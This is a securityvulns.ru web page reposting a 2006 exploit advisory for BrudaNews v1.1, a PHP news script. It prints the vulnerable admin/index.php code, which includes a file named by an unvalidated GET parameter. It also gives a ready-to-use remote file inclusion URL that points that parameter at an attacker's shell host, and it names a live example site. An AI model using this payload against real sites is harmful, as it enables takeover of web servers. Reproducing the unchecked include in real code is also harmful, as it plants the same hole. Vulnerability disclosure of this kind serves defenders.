Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Minerva <= v238 (phpbb_root_path)
Remote File Inclusion Exploit

  IM Portal <= v1.2.0 (phpbb_root_path)
Remote File Inclusion Exploit

  evoBB <= v0.3 (path) Remote File Inclusion Exploit

  BrudaGB <= v1.1 (o) Remote File Inclusion Exploit

From:SHiKaA-_(at)_hotmail.com <SHiKaA-_(at)_hotmail.com>
Date:26.09.2006
Subject:BrudaNews <= v1.1 (o) Remote File Inclusion Exploit

#================================================================================
==============
#BrudaNews <= v1.1 (o) Remote File Inclusion Exploit
#================================================================================
===============
#                                                                      
#Critical Level : Dangerous                                            
#                                                                      
#Venedor site : http://www.brudaswen.de      
#                                                                      
#Version : v1.1 & 1.0                                            
#                                                        
#================================================================================
================
#
#Example : http://www.nebelweb.de/php/news
#
#================================================================================
================
#Bug in : admin/index.php
#
#Vlu Code :
#--------------------------------
<?
if($_GET[o] != "")
{
include($_GET[o].".php");
 }
BrudaNews();
  ?>
#
#================================================================================
================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/admin/index.php?o=http://SHELLURL.COM
#
#================================================================================
================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#Special Thx To : Str0ke & simoo & Timq & XoRoN & Saudi HAckerz
=================================================================================
=================

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru
test server